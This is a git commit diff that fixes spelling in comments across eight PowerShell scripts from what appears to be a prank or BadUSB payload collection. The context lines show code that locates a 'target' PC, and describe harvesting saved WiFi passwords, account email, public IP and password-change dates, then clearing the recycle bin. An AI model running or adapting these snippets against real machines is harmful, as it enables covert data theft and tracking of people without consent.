This commit is contained in:
FalsePhilosopher 2022-08-30 20:24:49 -06:00
parent 3b488d3d15
commit cb20b5739e
8 changed files with 22 additions and 22 deletions

View file

@ -86,7 +86,7 @@ function Get-GeoLocation{
try { try {
Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
$GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object $GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
$GeoWatcher.Start() #Begin resolving current locaton $GeoWatcher.Start() #Begin resolving current location
while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) { while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
Start-Sleep -Milliseconds 100 #Wait for discovery. Start-Sleep -Milliseconds 100 #Wait for discovery.
@ -95,7 +95,7 @@ function Get-GeoLocation{
if ($GeoWatcher.Permission -eq 'Denied'){ if ($GeoWatcher.Permission -eq 'Denied'){
Write-Error 'Access Denied for Location Information' Write-Error 'Access Denied for Location Information'
} else { } else {
$GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results. $GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevant results.
} }
} }
# Write Error is just for troubleshooting # Write Error is just for troubleshooting

View file

@ -19,12 +19,12 @@
<# <#
.NOTES .NOTES
This script was not optimized to shorten the code. This script is intended to have as much readablility as possible for new coders to learn. This script was not optimized to shorten the code. This script is intended to have as much readability as possible for new coders to learn.
.DESCRIPTION .DESCRIPTION
This program gathers details from target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account. This program gathers details from target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account.
The SSID and WiFi password of any current or previously connected to networks. The SSID and WiFi password of any current or previously connected to networks.
It determines the last day they changed thier password and how many days ago. It determines the last day they changed their password and how many days ago.
Once the information is gathered the script will pause until a mouse movement is detected Once the information is gathered the script will pause until a mouse movement is detected
Then the script uses Sapi speak to roast their set up and lack of security Then the script uses Sapi speak to roast their set up and lack of security
#> #>
@ -464,7 +464,7 @@ echo "All Wifi Passes Done"
$days = [int]$DateArray[0] $days = [int]$DateArray[0]
} }
# If no password set date is detected funtion will return $null to cancel Sapi Speak # If no password set date is detected function will return $null to cancel Sapi Speak
# Write Error is just for troubleshooting # Write Error is just for troubleshooting
catch {Write-Error "Day password set not found" catch {Write-Error "Day password set not found"
@ -612,9 +612,9 @@ $blinks = 3;$o=New-Object -ComObject WScript.Shell;for ($num = 1 ; $num -le $bli
Then the script will be paused until the mouse is moved Then the script will be paused until the mouse is moved
script will check mouse position every indicated number of seconds script will check mouse position every indicated number of seconds
This while loop will constantly check if the mouse has been moved This while loop will constantly check if the mouse has been moved
"CAPSLOCK" will be continously pressed to prevent screen from turning off "CAPSLOCK" will be continuously pressed to prevent screen from turning off
it will then sleep for the indicated number of seconds and check again it will then sleep for the indicated number of seconds and check again
when mouse is moved it will break out of the loop and continue theipt when mouse is moved it will break out of the loop and continue the script
#> #>
@ -691,7 +691,7 @@ Clear-RecycleBin -Force -ErrorAction SilentlyContinue
#---------------------------------------------------------------------------------------------------- #----------------------------------------------------------------------------------------------------
# This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off # This script repeatedly presses the capslock button, this snippet will make sure capslock is turned back off
Add-Type -AssemblyName System.Windows.Forms Add-Type -AssemblyName System.Windows.Forms
$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock') $caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')

View file

@ -204,7 +204,7 @@ Clear-RecycleBin -Force -ErrorAction SilentlyContinue
#---------------------------------------------------------------------------------------------------- #----------------------------------------------------------------------------------------------------
# This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off # This script repeatedly presses the capslock button, this snippet will make sure capslock is turned back off
Add-Type -AssemblyName System.Windows.Forms Add-Type -AssemblyName System.Windows.Forms
$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock') $caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')

View file

@ -194,9 +194,9 @@ echo "Hello $fullName"
Then the script will be paused until the mouse is moved Then the script will be paused until the mouse is moved
script will check mouse position every indicated number of seconds script will check mouse position every indicated number of seconds
This while loop will constantly check if the mouse has been moved This while loop will constantly check if the mouse has been moved
"CAPSLOCK" will be continously pressed to prevent screen from turning off "CAPSLOCK" will be continuously pressed to prevent screen from turning off
it will then sleep for the indicated number of seconds and check again it will then sleep for the indicated number of seconds and check again
when mouse is moved it will break out of the loop and continue theipt when mouse is moved it will break out of the loop and continue the script
#> #>

View file

@ -20,7 +20,7 @@
<# <#
.NOTES .NOTES
This script will convert an approximation of what your image should look like. Most likely you'll need to test several images to find one that works This script will convert an approximation of what your image should look like. Most likely you'll need to test several images to find one that works
well. It is best to use images no larger than 150x150 pixels, but I would even recommend going smaller than that. My exmaple image is 25x20 pixels well. It is best to use images no larger than 150x150 pixels, but I would even recommend going smaller than that. My example image is 25x20 pixels
To increase the size of the pixels add more spaces to the following Write-Host command. To increase the size of the pixels add more spaces to the following Write-Host command.
Write-Host " " -NoNewline -BackgroundColor $BackGround Write-Host " " -NoNewline -BackgroundColor $BackGround
@ -161,9 +161,9 @@ echo "Hello $fullName"
Then the script will be paused until the mouse is moved Then the script will be paused until the mouse is moved
script will check mouse position every indicated number of seconds script will check mouse position every indicated number of seconds
This while loop will constantly check if the mouse has been moved This while loop will constantly check if the mouse has been moved
"CAPSLOCK" will be continously pressed to prevent screen from turning off "CAPSLOCK" will be continuously pressed to prevent screen from turning off
it will then sleep for the indicated number of seconds and check again it will then sleep for the indicated number of seconds and check again
when mouse is moved it will break out of the loop and continue theipt when mouse is moved it will break out of the loop and continue the script
#> #>

View file

@ -34,7 +34,7 @@ Add-Type -AssemblyName System.Windows.Forms
$cycles = 3 $cycles = 3
# List as many questions here as you like, it will cycke through all of them # List as many questions here as you like, it will cycle through all of them
$msgs = @( $msgs = @(
"Are all scammers as dumb as you?" "Are all scammers as dumb as you?"

View file

@ -75,14 +75,14 @@ echo "`nYour computer is not very secure" >> $Env:temp\foo.txt
<# <#
.NOTES .NOTES
This is to get the current Latitide and Longitude of your target This is to get the current Latitude and Longitude of your target
#> #>
function Get-GeoLocation{ function Get-GeoLocation{
try { try {
Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
$GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object $GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
$GeoWatcher.Start() #Begin resolving current locaton $GeoWatcher.Start() #Begin resolving current location
while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) { while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
Start-Sleep -Milliseconds 100 #Wait for discovery. Start-Sleep -Milliseconds 100 #Wait for discovery.
@ -91,7 +91,7 @@ function Get-GeoLocation{
if ($GeoWatcher.Permission -eq 'Denied'){ if ($GeoWatcher.Permission -eq 'Denied'){
Write-Error 'Access Denied for Location Information' Write-Error 'Access Denied for Location Information'
} else { } else {
$GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results. $GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevant results.
} }
} }
@ -168,7 +168,7 @@ if ($PubIP) { echo "`nYour Public IP: $PubIP" >> $Env:temp\foo.txt }
} }
# If no password set date is detected funtion will return $null to cancel Sapi Speak # If no password set date is detected function will return $null to cancel Sapi Speak
# Write Error is just for troubleshooting # Write Error is just for troubleshooting
catch {Write-Error "Day password set not found" catch {Write-Error "Day password set not found"

View file

@ -27,7 +27,7 @@
.DESCRIPTION .DESCRIPTION
This program gathers details from target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account. This program gathers details from target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account.
The SSID and WiFi password of any current or previously connected to networks. The SSID and WiFi password of any current or previously connected to networks.
It determines the last day they changed thier password and how many days ago. It determines the last day they changed their password and how many days ago.
Once the information is gathered the script will pause until a mouse movement is detected Once the information is gathered the script will pause until a mouse movement is detected
Then the script uses Sapi speak to roast their set up and lack of security Then the script uses Sapi speak to roast their set up and lack of security
#> #>
@ -67,7 +67,7 @@ $FN = Get-fullName
<# <#
.NOTES .NOTES
This is to get the current Latitide and Longitude of your target This is to get the current Latitude and Longitude of your target
#> #>
function Get-GeoLocation{ function Get-GeoLocation{
@ -83,7 +83,7 @@ function Get-GeoLocation{
if ($GeoWatcher.Permission -eq 'Denied'){ if ($GeoWatcher.Permission -eq 'Denied'){
Write-Error 'Access Denied for Location Information' Write-Error 'Access Denied for Location Information'
} else { } else {
$GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results. $GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevant results.
} }
} }